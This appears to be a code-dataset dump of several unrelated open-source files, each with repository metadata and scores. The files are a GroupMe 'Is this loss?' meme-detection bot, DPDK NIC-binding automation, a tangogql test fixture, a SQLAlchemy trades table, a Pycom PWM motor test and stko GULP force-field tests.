new_im = Image.new("RGB", (final_size, final_size))
new_im.paste(img, (0, 0))
img = new_im
# Make image grayscale
img = img.convert('LA')
# Create array of image info
pic_array = [[]]
width, height = img.size
data = img.load()
pic_array[0].append(0)
for y in range(height):
for x in range(width):
pic_array[0].append(data[x,y][0])
df = pd.DataFrame(data=pic_array)
prediction_targets, prediction_examples = helper.parse_labels_and_features(df)
predict_input_fn = helper.create_predict_input_fn(
prediction_examples, prediction_targets, 1)
predictions = list(classifier.predict(input_fn=predict_input_fn))
predicted_classes = [p["classes"] for p in predictions]
print(predictions)
for c in predicted_classes:
predicted_class = str(c[0])
if predicted_class == "b\'1\'":
text = "Is this loss?"
print(predicted_class)
post_params = { 'bot_id' : conf.bot_id(), 'text': text }
requests.post('https://api.groupme.com/v3/bots/post', params = post_params)
else:
print(predicted_class)
request_params['after_id'] = message['id']
time.sleep(1)
| # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
import IsThisLossHelper as helper
import IsThisLossBotConfig as conf
import time
import os
import IsThisLossV1 as loss
import tensorflow as tf
import numpy as np
import pandas as pd
from PIL import Image
from io import BytesIO
print("Loading bot...")
classifier, accuracy = loss.getIsThisLossModel()
request_params = conf.request_params()
#Get to the latest message
response = response = requests.get('https://api.groupme.com/v3/groups/' + conf.group_id() + '/messages', params = request_params)
if response.status_code == 200:
response_messages = response.json()['response']['messages']
request_params['after_id'] = response_messages[0]['id']
response = response = requests.get('https://api.groupme.com/v3/groups/' + conf.group_id() + '/messages', params = request_params)
print("Ready to run!")
intro_text = ("Hey there, my name is IsThisLossBotV1!\n"
"I\'ll be sure to butt into the conversation if I see a Loss meme!\n"
"Today I am " + str(100*accuracy) + "% accurate!")
post_params = { 'bot_id' : conf.bot_id(), 'text': intro_text }
requests.post('https://api.groupme.com/v3/bots/post', params = post_params)
while True:
response = requests.get('https://api.groupme.com/v3/groups/' + conf.group_id() + '/messages', params = request_params)
if response.status_code == 200:
response_messages = response.json()['response']['messages']
for message in response_messages:
for attachment in message['attachments']:
if (attachment['type'] == "image"):
print(attachment['url'])
pic_response = requests.get(attachment['url'])
img = Image.open(BytesIO(pic_response.content))
# Resize image to 100x100
final_size = 100
new_image_size = (final_size, final_size)
img = img.resize(new_image_size, Image.ANTIALIAS)
new_im = Image.new("RGB", (final_size, final_size))
new_im.paste(img, (0, 0))
img = new_im
# Make image grayscale
img = img.convert('LA')
# Create array of image info
pic_array = [[]]
width, height = img.size
data = img.load()
pic_array[0].append(0)
for y in range(height):
for x in range(width):
pic_array[0].append(data[x,y][0])
df = pd.DataFrame(data=pic_array)
prediction_targets, prediction_examples = helper.parse_labels_and_features(df)
predict_input_fn = helper.create_predict_input_fn(
prediction_examples, prediction_targets, 1)
predictions = list(classifier.predict(input_fn=predict_input_fn))
predicted_classes = [p["classes"] for p in predictions]
print(predictions)
for c in predicted_classes:
predicted_class = str(c[0])
if predicted_class == "b\'1\'":
text = "Is this loss?"
print(predicted_class)
post_params = { 'bot_id' : conf.bot_id(), 'text': text }
requests.post('https://api.groupme.com/v3/bots/post', params = post_params)
else:
print(predicted_class)
request_params['after_id'] = message['id']
time.sleep(1)
| en | 0.854656 | # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #Get to the latest message # Resize image to 100x100 # Make image grayscale # Create array of image info | 2.18015 | 2 |
web-maxiv-tangogql/conftest.py | snehalpersistent/snehalvgithub | 0 | 6613978 | <gh_stars>0
#!/usr/bin/env python3
"""Configuration and commons for tests."""
# build-in modules
# third-party modules
import pytest
from graphene.test import Client
# changes to the path ...
# project modules
from tangogql.schema.tango import tangoschema
# import queries
import asyncio
from graphql.execution.executors.asyncio import AsyncioExecutor
__author__ = "antmil"
__docformat__ = "restructuredtext"
class TangogqlClient(object):
def __init__(self):
self.client = Client(tangoschema)
def execute(self, query):
loop = asyncio.get_event_loop()
r = self.client.execute(query, executor=AsyncioExecutor(loop=loop))
return r["data"]
@pytest.fixture
def client():
client = TangogqlClient()
return client
| #!/usr/bin/env python3
"""Configuration and commons for tests."""
# build-in modules
# third-party modules
import pytest
from graphene.test import Client
# changes to the path ...
# project modules
from tangogql.schema.tango import tangoschema
# import queries
import asyncio
from graphql.execution.executors.asyncio import AsyncioExecutor
__author__ = "antmil"
__docformat__ = "restructuredtext"
class TangogqlClient(object):
def __init__(self):
self.client = Client(tangoschema)
def execute(self, query):
loop = asyncio.get_event_loop()
r = self.client.execute(query, executor=AsyncioExecutor(loop=loop))
return r["data"]
@pytest.fixture
def client():
client = TangogqlClient()
return client | en | 0.442001 | #!/usr/bin/env python3 Configuration and commons for tests. # build-in modules # third-party modules # changes to the path ... # project modules # import queries | 1.931562 | 2 |
src/dpdk/dpdk.py | shreyagupta30/vineperf | 9 | 6613979 | # Copyright 2015-2017 Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Automation of system configuration for DPDK use.
Parts of this based on ``tools/dpdk*bind.py`` script from Intel(R)
DPDK.
"""
from sys import platform as _platform
import os
import subprocess
import logging
import glob
from conf import settings as S
from tools import tasks
from tools.module_manager import ModuleManager
_LOGGER = logging.getLogger(__name__)
_DPDK_MODULE_MANAGER = ModuleManager()
# declare global NIC variables only as their content might not be known yet
_NICS = []
_NICS_PCI = []
#
# system management
#
def init():
"""Setup system for DPDK.
"""
# pylint: disable=global-statement
global _NICS
global _NICS_PCI
_NICS = S.getValue('NICS')
_NICS_PCI = list(nic['pci'] for nic in _NICS)
if not _is_linux():
_LOGGER.error('Not running on a compatible Linux version. Exiting...')
return
_insert_modules()
_remove_vhost_net()
_bind_nics()
def cleanup():
"""Setup system for DPDK.
"""
if not _is_linux():
_LOGGER.error('Not running on a compatible Linux version. Exiting...')
return
_unbind_nics()
_remove_modules()
_vhost_user_cleanup()
#
# basic compatibility test
#
def _is_linux():
"""Check if running on Linux.
Many of the functions in this file rely on features commonly found
only on Linux (i.e. ``/proc`` is not present on FreeBSD). Hence, this
check is important to ensure someone doesn't run this on an incompatible
OS or distro.
"""
return _platform.startswith('linux') and os.path.isdir('/proc')
#
# module management
#
def _insert_modules():
"""Ensure required modules are inserted on system.
"""
_DPDK_MODULE_MANAGER.insert_modules(S.getValue('TOOLS')['dpdk_modules'])
def _remove_modules():
"""Ensure required modules are removed from system.
"""
_DPDK_MODULE_MANAGER.remove_modules()
#
# 'vhost-net' module cleanup
#
def _remove_vhost_net():
"""Remove vhost-net driver and file.
"""
_DPDK_MODULE_MANAGER.remove_module('vhost-net')
try:
tasks.run_task(['sudo', 'rm', '-f', '/dev/vhost-net'], _LOGGER,
'Removing \'/dev/vhost-net\' directory...', True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to remove directory \'/dev/vhost-net\'.')
#
# Vhost-user cleanup
#
def _vhost_user_cleanup():
"""Remove files created by vhost-user tests.
"""
for sock in glob.glob(os.path.join(S.getValue('TOOLS')['ovs_var_tmp'],
S.getValue('VHOST_USER_SOCKS'))):
if os.path.exists(sock):
try:
tasks.run_task(['sudo', 'rm', sock],
_LOGGER,
'Deleting vhost-user socket \'%s\'...' %
sock,
True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to delete vhost-user socket \'%s\'.',
sock)
continue
#
# NIC management
#
def _bind_nics():
"""Bind NICs using the bind tool specified in the configuration.
"""
if not _NICS_PCI:
_LOGGER.info('NICs are not configured - nothing to bind')
return
try:
_driver = 'igb_uio'
if 'vfio-pci' in S.getValue('TOOLS')['dpdk_modules']:
_driver = 'vfio-pci'
tasks.run_task(['sudo', 'chmod', 'a+x', '/dev/vfio'],
_LOGGER, 'Setting VFIO permissions .. a+x',
True)
tasks.run_task(['sudo', 'chmod', '-R', '666', '/dev/vfio/'],
_LOGGER, 'Setting VFIO permissions .. 0666',
True)
if 'driverctl' in S.getValue('TOOLS')['bind-tool'].lower():
for nic in _NICS_PCI:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'], '-v',
'set-override'] + [nic] + [_driver], _LOGGER,
'Binding NIC %s...' % nic, True)
else:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'],
'--bind=' + _driver] +
_NICS_PCI, _LOGGER,
'Binding NICs %s...' % _NICS_PCI,
True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to bind NICs %s', str(_NICS_PCI))
def _unbind_nics():
"""Unbind NICs using the bind tool specified in the configuration.
"""
if not _NICS_PCI:
_LOGGER.info('NICs are not configured - nothing to unbind')
return
try:
if 'driverctl' in S.getValue('TOOLS')['bind-tool'].lower():
for nic in _NICS_PCI:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'], '-v',
'unset-override'] + [nic], _LOGGER,
'Binding NIC %s...' % nic, True)
else:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'],
'--unbind'] +
_NICS_PCI, _LOGGER,
'Unbinding NICs %s...' % str(_NICS_PCI),
True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to unbind NICs %s', str(_NICS_PCI))
# Rebind NICs to their original drivers
# using the Intel DPDK ``dpdk*bind.py`` tool.
for nic in _NICS:
try:
if nic['driver']:
if 'driverctl' in S.getValue('TOOLS')['bind-tool'].lower():
# driverctl restores the driver automatically on unset
break
else:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'],
'--bind',
nic['driver'], nic['pci']],
_LOGGER, 'Binding NIC %s to %s...' %
(nic['pci'], nic['driver']),
True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to bind NIC %s to driver %s',
nic['pci'], nic['driver'])
class Dpdk(object):
"""A context manager for the system init/cleanup.
"""
def __enter__(self):
_LOGGER.info('Setting up DPDK')
init()
return self
def __exit__(self, type_, value, traceback):
_LOGGER.info('Cleaning up DPDK')
cleanup()
| # Copyright 2015-2017 Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Automation of system configuration for DPDK use.
Parts of this based on ``tools/dpdk*bind.py`` script from Intel(R)
DPDK.
"""
from sys import platform as _platform
import os
import subprocess
import logging
import glob
from conf import settings as S
from tools import tasks
from tools.module_manager import ModuleManager
_LOGGER = logging.getLogger(__name__)
_DPDK_MODULE_MANAGER = ModuleManager()
# declare global NIC variables only as their content might not be known yet
_NICS = []
_NICS_PCI = []
#
# system management
#
def init():
"""Setup system for DPDK.
"""
# pylint: disable=global-statement
global _NICS
global _NICS_PCI
_NICS = S.getValue('NICS')
_NICS_PCI = list(nic['pci'] for nic in _NICS)
if not _is_linux():
_LOGGER.error('Not running on a compatible Linux version. Exiting...')
return
_insert_modules()
_remove_vhost_net()
_bind_nics()
def cleanup():
"""Setup system for DPDK.
"""
if not _is_linux():
_LOGGER.error('Not running on a compatible Linux version. Exiting...')
return
_unbind_nics()
_remove_modules()
_vhost_user_cleanup()
#
# basic compatibility test
#
def _is_linux():
"""Check if running on Linux.
Many of the functions in this file rely on features commonly found
only on Linux (i.e. ``/proc`` is not present on FreeBSD). Hence, this
check is important to ensure someone doesn't run this on an incompatible
OS or distro.
"""
return _platform.startswith('linux') and os.path.isdir('/proc')
#
# module management
#
def _insert_modules():
"""Ensure required modules are inserted on system.
"""
_DPDK_MODULE_MANAGER.insert_modules(S.getValue('TOOLS')['dpdk_modules'])
def _remove_modules():
"""Ensure required modules are removed from system.
"""
_DPDK_MODULE_MANAGER.remove_modules()
#
# 'vhost-net' module cleanup
#
def _remove_vhost_net():
"""Remove vhost-net driver and file.
"""
_DPDK_MODULE_MANAGER.remove_module('vhost-net')
try:
tasks.run_task(['sudo', 'rm', '-f', '/dev/vhost-net'], _LOGGER,
'Removing \'/dev/vhost-net\' directory...', True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to remove directory \'/dev/vhost-net\'.')
#
# Vhost-user cleanup
#
def _vhost_user_cleanup():
"""Remove files created by vhost-user tests.
"""
for sock in glob.glob(os.path.join(S.getValue('TOOLS')['ovs_var_tmp'],
S.getValue('VHOST_USER_SOCKS'))):
if os.path.exists(sock):
try:
tasks.run_task(['sudo', 'rm', sock],
_LOGGER,
'Deleting vhost-user socket \'%s\'...' %
sock,
True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to delete vhost-user socket \'%s\'.',
sock)
continue
#
# NIC management
#
def _bind_nics():
"""Bind NICs using the bind tool specified in the configuration.
"""
if not _NICS_PCI:
_LOGGER.info('NICs are not configured - nothing to bind')
return
try:
_driver = 'igb_uio'
if 'vfio-pci' in S.getValue('TOOLS')['dpdk_modules']:
_driver = 'vfio-pci'
tasks.run_task(['sudo', 'chmod', 'a+x', '/dev/vfio'],
_LOGGER, 'Setting VFIO permissions .. a+x',
True)
tasks.run_task(['sudo', 'chmod', '-R', '666', '/dev/vfio/'],
_LOGGER, 'Setting VFIO permissions .. 0666',
True)
if 'driverctl' in S.getValue('TOOLS')['bind-tool'].lower():
for nic in _NICS_PCI:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'], '-v',
'set-override'] + [nic] + [_driver], _LOGGER,
'Binding NIC %s...' % nic, True)
else:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'],
'--bind=' + _driver] +
_NICS_PCI, _LOGGER,
'Binding NICs %s...' % _NICS_PCI,
True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to bind NICs %s', str(_NICS_PCI))
def _unbind_nics():
"""Unbind NICs using the bind tool specified in the configuration.
"""
if not _NICS_PCI:
_LOGGER.info('NICs are not configured - nothing to unbind')
return
try:
if 'driverctl' in S.getValue('TOOLS')['bind-tool'].lower():
for nic in _NICS_PCI:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'], '-v',
'unset-override'] + [nic], _LOGGER,
'Binding NIC %s...' % nic, True)
else:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'],
'--unbind'] +
_NICS_PCI, _LOGGER,
'Unbinding NICs %s...' % str(_NICS_PCI),
True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to unbind NICs %s', str(_NICS_PCI))
# Rebind NICs to their original drivers
# using the Intel DPDK ``dpdk*bind.py`` tool.
for nic in _NICS:
try:
if nic['driver']:
if 'driverctl' in S.getValue('TOOLS')['bind-tool'].lower():
# driverctl restores the driver automatically on unset
break
else:
tasks.run_task(['sudo', S.getValue('TOOLS')['bind-tool'],
'--bind',
nic['driver'], nic['pci']],
_LOGGER, 'Binding NIC %s to %s...' %
(nic['pci'], nic['driver']),
True)
except subprocess.CalledProcessError:
_LOGGER.error('Unable to bind NIC %s to driver %s',
nic['pci'], nic['driver'])
class Dpdk(object):
"""A context manager for the system init/cleanup.
"""
def __enter__(self):
_LOGGER.info('Setting up DPDK')
init()
return self
def __exit__(self, type_, value, traceback):
_LOGGER.info('Cleaning up DPDK')
cleanup()
| en | 0.824879 | # Copyright 2015-2017 Intel Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Automation of system configuration for DPDK use. Parts of this based on ``tools/dpdk*bind.py`` script from Intel(R) DPDK. # declare global NIC variables only as their content might not be known yet # # system management # Setup system for DPDK. # pylint: disable=global-statement Setup system for DPDK. # # basic compatibility test # Check if running on Linux. Many of the functions in this file rely on features commonly found only on Linux (i.e. ``/proc`` is not present on FreeBSD). Hence, this check is important to ensure someone doesn't run this on an incompatible OS or distro. # # module management # Ensure required modules are inserted on system. Ensure required modules are removed from system. # # 'vhost-net' module cleanup # Remove vhost-net driver and file. # # Vhost-user cleanup # Remove files created by vhost-user tests. # # NIC management # Bind NICs using the bind tool specified in the configuration. Unbind NICs using the bind tool specified in the configuration. # Rebind NICs to their original drivers # using the Intel DPDK ``dpdk*bind.py`` tool. # driverctl restores the driver automatically on unset A context manager for the system init/cleanup. | 1.968958 | 2 |
head_detection/main.py | Tiago-Roxo/YinYang-Net | 2 | 6613980 | <reponame>Tiago-Roxo/YinYang-Net
"""
@author: <NAME>, UBI
@date: 2021
"""
import argparse
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from utils.argparser import *
from draw_keypoints import *
from os import listdir
from os.path import isfile, join
from tqdm import tqdm
import os
from utils.head_detect_config import OUTPUT_DIR
def parse_arguments():
"""
Parser arguments given. Enables the display of "help" funcionality
@Returns: arguments parsed and stores the parameters given to the python file in appropriate variables
"""
parser = argparse.ArgumentParser()
parser.add_argument(INPUT, INPUT_EXTENDED,default=INPUT_DEFAULT, help=INPUT_HELP)
parser.add_argument(METHOD, METHOD_EXTENDED,default=METHOD_DEFAULT, help=METHOD_HELP)
parser.add_argument(DRAWING_DIR_EXTENDED)
args = parser.parse_args()
return args
if __name__ == "__main__":
args = parse_arguments()
list_imgs = [f for f in listdir(args.img_dir) if isfile(join(args.img_dir, f))]
list_imgs.sort()
os.makedirs(OUTPUT_DIR, exist_ok = True)
output_dir = None
json_kp_path = None
method_name = None
output_dir = os.path.join(OUTPUT_DIR, args.method+"/draw")
output_dir_crop = os.path.join(OUTPUT_DIR, args.method+"/crop")
os.makedirs(output_dir, exist_ok = True)
os.makedirs(output_dir_crop, exist_ok = True)
json_kp_path = args.input
method_name = args.method
for img_id in tqdm(list_imgs):
img_id = img_id
draw_keypoints_img(json_kp_path, method_name, img_id, output_dir, output_dir_crop, args.img_dir)
| """
@author: <NAME>, UBI
@date: 2021
"""
import argparse
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from utils.argparser import *
from draw_keypoints import *
from os import listdir
from os.path import isfile, join
from tqdm import tqdm
import os
from utils.head_detect_config import OUTPUT_DIR
def parse_arguments():
"""
Parser arguments given. Enables the display of "help" funcionality
@Returns: arguments parsed and stores the parameters given to the python file in appropriate variables
"""
parser = argparse.ArgumentParser()
parser.add_argument(INPUT, INPUT_EXTENDED,default=INPUT_DEFAULT, help=INPUT_HELP)
parser.add_argument(METHOD, METHOD_EXTENDED,default=METHOD_DEFAULT, help=METHOD_HELP)
parser.add_argument(DRAWING_DIR_EXTENDED)
args = parser.parse_args()
return args
if __name__ == "__main__":
args = parse_arguments()
list_imgs = [f for f in listdir(args.img_dir) if isfile(join(args.img_dir, f))]
list_imgs.sort()
os.makedirs(OUTPUT_DIR, exist_ok = True)
output_dir = None
json_kp_path = None
method_name = None
output_dir = os.path.join(OUTPUT_DIR, args.method+"/draw")
output_dir_crop = os.path.join(OUTPUT_DIR, args.method+"/crop")
os.makedirs(output_dir, exist_ok = True)
os.makedirs(output_dir_crop, exist_ok = True)
json_kp_path = args.input
method_name = args.method
for img_id in tqdm(list_imgs):
img_id = img_id
draw_keypoints_img(json_kp_path, method_name, img_id, output_dir, output_dir_crop, args.img_dir) | en | 0.264553 | @author: <NAME>, UBI @date: 2021 Parser arguments given. Enables the display of "help" funcionality @Returns: arguments parsed and stores the parameters given to the python file in appropriate variables | 2.837113 | 3 |
vpa/db/trades.py | nanvel/bittrex_vpa | 1 | 6613981 | import sqlalchemy as sa
from sqlalchemy.orm import mapper
from .base import metadata
TradesTable = sa.Table(
'trades',
metadata,
sa.Column('trade_id', sa.Integer, primary_key=True), # autoincrement
sa.Column('market', sa.String(10)),
sa.Column('order_type', sa.String(4)),
sa.Column('rate', sa.Float()),
sa.Column('quantity', sa.Float()),
sa.Column('timestamp', sa.DateTime()),
sa.Index('idx_timestamp', 'timestamp', unique=False)
)
class TradeMapper:
ORDER_TYPE_SELL = 'SELL'
ORDER_TYPE_BUY = 'BUY'
def __init__(self, trade_id, market, order_type, rate, quantity, timestamp):
self.trade_id = trade_id
self.market = market
self.order_type = order_type
self.rate = rate
self.quantity = quantity
self.timestamp = timestamp
mapper(TradeMapper, TradesTable)
| import sqlalchemy as sa
from sqlalchemy.orm import mapper
from .base import metadata
TradesTable = sa.Table(
'trades',
metadata,
sa.Column('trade_id', sa.Integer, primary_key=True), # autoincrement
sa.Column('market', sa.String(10)),
sa.Column('order_type', sa.String(4)),
sa.Column('rate', sa.Float()),
sa.Column('quantity', sa.Float()),
sa.Column('timestamp', sa.DateTime()),
sa.Index('idx_timestamp', 'timestamp', unique=False)
)
class TradeMapper:
ORDER_TYPE_SELL = 'SELL'
ORDER_TYPE_BUY = 'BUY'
def __init__(self, trade_id, market, order_type, rate, quantity, timestamp):
self.trade_id = trade_id
self.market = market
self.order_type = order_type
self.rate = rate
self.quantity = quantity
self.timestamp = timestamp
mapper(TradeMapper, TradesTable)
| cs | 0.195343 | # autoincrement | 2.770401 | 3 |
gluon/cmd/cli.py | lfntac/ipv6 | 0 | 6613982 | # Copyright (c) 2015 Cisco Systems, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import click
import sys
import types
from oslo_config import cfg
import gluon.conf
from gluon.particleGenerator.cli import get_api_model
from gluon.particleGenerator.cli import proc_model
from gluon.particleGenerator.generator import get_model_list
CONF = cfg.CONF
sys.tracebacklimit = 0
def dummy():
pass
def main():
cli = types.FunctionType(dummy.func_code, {})
cli = click.group()(cli)
model_list = get_model_list()
model = get_api_model(sys.argv, model_list)
proc_model(cli,
package_name="gluon",
model_dir="models",
api_model=model,
hostenv="OS_PROTON_HOST",
portenv="OS_PROTON_PORT",
hostdefault=CONF.api.host,
portdefault=CONF.api.port)
cli()
| # Copyright (c) 2015 Cisco Systems, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import click
import sys
import types
from oslo_config import cfg
import gluon.conf
from gluon.particleGenerator.cli import get_api_model
from gluon.particleGenerator.cli import proc_model
from gluon.particleGenerator.generator import get_model_list
CONF = cfg.CONF
sys.tracebacklimit = 0
def dummy():
pass
def main():
cli = types.FunctionType(dummy.func_code, {})
cli = click.group()(cli)
model_list = get_model_list()
model = get_api_model(sys.argv, model_list)
proc_model(cli,
package_name="gluon",
model_dir="models",
api_model=model,
hostenv="OS_PROTON_HOST",
portenv="OS_PROTON_PORT",
hostdefault=CONF.api.host,
portdefault=CONF.api.port)
cli()
| en | 0.852649 | # Copyright (c) 2015 Cisco Systems, Inc. # All Rights Reserved # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. | 1.826852 | 2 |
controller/test1/test4.py | drummonds/od-robot | 0 | 6613983 | # Test4 trying to ramp rotor
from machine import Pin
import pycom
import time
from machine import PWM
# initialisation code
pycom.heartbeat(False)
pycom.rgbled(0x008080) # Start colour
def speed_to_dc(speed): # Converts to 1 -2 ms pulses
# speed in %
dc = (speed / 100.0) * (1/20) + (1/20)
return dc
# create pwm channel on pin P12
pwm = PWM(0, frequency=50) # use PWM timer 0, with a frequency of 50Hz
pwm_c = pwm.channel(0, pin='P12', duty_cycle=speed_to_dc(0))
# initialize `P9` in gpio mode and make it an output
p_out = Pin('P9', mode=Pin.OUT)
p_out.value(1)
p_out.value(0)
p_out.toggle()
p_out(True)
# make `P10` an input with the pull-up enabled
p_in = Pin('P10', mode=Pin.IN, pull=Pin.PULL_UP)
p_in() # get value, 0 or 1
time.sleep(2)
i = 0
while p_in() == 1:
pwm_c.duty_cycle(speed_to_dc(i*10)) # change the duty cycle to 20%
if i < 10:
i = i++1
pycom.rgbled(0x008000) # Green
time.sleep(1)
pycom.rgbled(0x000080) # Blue
time.sleep(1)
p_out.toggle()
pwm_c.duty_cycle(speed_to_dc(0)) # change the duty cycle to 20%
pycom.rgbled(0x800000) # Red
| # Test4 trying to ramp rotor
from machine import Pin
import pycom
import time
from machine import PWM
# initialisation code
pycom.heartbeat(False)
pycom.rgbled(0x008080) # Start colour
def speed_to_dc(speed): # Converts to 1 -2 ms pulses
# speed in %
dc = (speed / 100.0) * (1/20) + (1/20)
return dc
# create pwm channel on pin P12
pwm = PWM(0, frequency=50) # use PWM timer 0, with a frequency of 50Hz
pwm_c = pwm.channel(0, pin='P12', duty_cycle=speed_to_dc(0))
# initialize `P9` in gpio mode and make it an output
p_out = Pin('P9', mode=Pin.OUT)
p_out.value(1)
p_out.value(0)
p_out.toggle()
p_out(True)
# make `P10` an input with the pull-up enabled
p_in = Pin('P10', mode=Pin.IN, pull=Pin.PULL_UP)
p_in() # get value, 0 or 1
time.sleep(2)
i = 0
while p_in() == 1:
pwm_c.duty_cycle(speed_to_dc(i*10)) # change the duty cycle to 20%
if i < 10:
i = i++1
pycom.rgbled(0x008000) # Green
time.sleep(1)
pycom.rgbled(0x000080) # Blue
time.sleep(1)
p_out.toggle()
pwm_c.duty_cycle(speed_to_dc(0)) # change the duty cycle to 20%
pycom.rgbled(0x800000) # Red
| en | 0.688393 | # Test4 trying to ramp rotor # initialisation code # Start colour # Converts to 1 -2 ms pulses # speed in % # create pwm channel on pin P12 # use PWM timer 0, with a frequency of 50Hz # initialize `P9` in gpio mode and make it an output # make `P10` an input with the pull-up enabled # get value, 0 or 1 # change the duty cycle to 20% # Green # Blue # change the duty cycle to 20% # Red | 3.24261 | 3 |
tests/optimizers/gulp/test_uff_assign_ff.py | stevenbennett96/stko | 8 | 6613984 | import pytest
import stk
from stko import GulpUFFOptimizer, ExpectedMetal
pd_metal = stk.BuildingBlock(
smiles='[Pd+2]',
functional_groups=(
stk.SingleAtom(stk.Pd(0, charge=2))
for i in range(4)
),
position_matrix=[[0, 0, 0]],
)
# Define a bidentate ligand with two functional groups.
bidentate_ligand = stk.BuildingBlock(
smiles='NCCN',
functional_groups=[
stk.SmartsFunctionalGroupFactory(
smarts='[#7]~[#6]',
bonders=(0, ),
deleters=(),
),
]
)
# Construct a cis-protected square planar metal complex.
complex = stk.ConstructedMolecule(
stk.metal_complex.BidentateSquarePlanar(
metals=pd_metal,
ligands=bidentate_ligand,
)
)
class CaseData:
"""
A test case.
Attributes
----------
molecule : :class:`.Molecule`
The molecule to be tested.
atom_types : :class:`dict`
The smiles for the molecule.
has_metal : :class:`bool`
``True`` if a metal atom is in molecule.
metal_ff : :class:`dict` or :class:`NoneType`
The position matrix of the molecule.
"""
def __init__(self, molecule, atom_types, has_metal, metal_ff):
self.molecule = molecule
self.atom_types = atom_types
self.has_metal = has_metal
self.metal_ff = metal_ff
@pytest.fixture(
params=(
CaseData(
molecule=stk.BuildingBlock('CCC'),
atom_types={
0: 'C_3', 1: 'C_3', 2: 'C_3',
3: 'H_', 4: 'H_', 5: 'H_',
6: 'H_', 7: 'H_',
8: 'H_', 9: 'H_', 10: 'H_',
},
has_metal=False,
metal_ff=None,
),
# CaseData(
# molecule=stk.BuildingBlock.init_from_molecule(complex),
# atom_types={},
# has_metal=True,
# metal_ff=None,
# ),
CaseData(
molecule=stk.BuildingBlock.init_from_molecule(complex),
atom_types={
0: 'Pd4+2',
1: 'N_3', 2: 'C_3', 3: 'C_3', 4: 'N_3',
5: 'H_', 6: 'H_', 7: 'H_', 8: 'H_', 9: 'H_',
10: 'H_', 11: 'H_', 12: 'H_',
13: 'N_3', 14: 'C_3', 15: 'C_3', 16: 'N_3',
17: 'H_', 18: 'H_', 19: 'H_', 20: 'H_', 21: 'H_',
22: 'H_', 23: 'H_', 24: 'H_',
},
has_metal=True,
metal_ff={46: 'Pd4+2'},
),
CaseData(
molecule=stk.BuildingBlock('CCC'),
atom_types={
0: 'C_3', 1: 'C_3', 2: 'C_3',
3: 'H_', 4: 'H_', 5: 'H_',
6: 'H_', 7: 'H_',
8: 'H_', 9: 'H_', 10: 'H_',
},
has_metal=False,
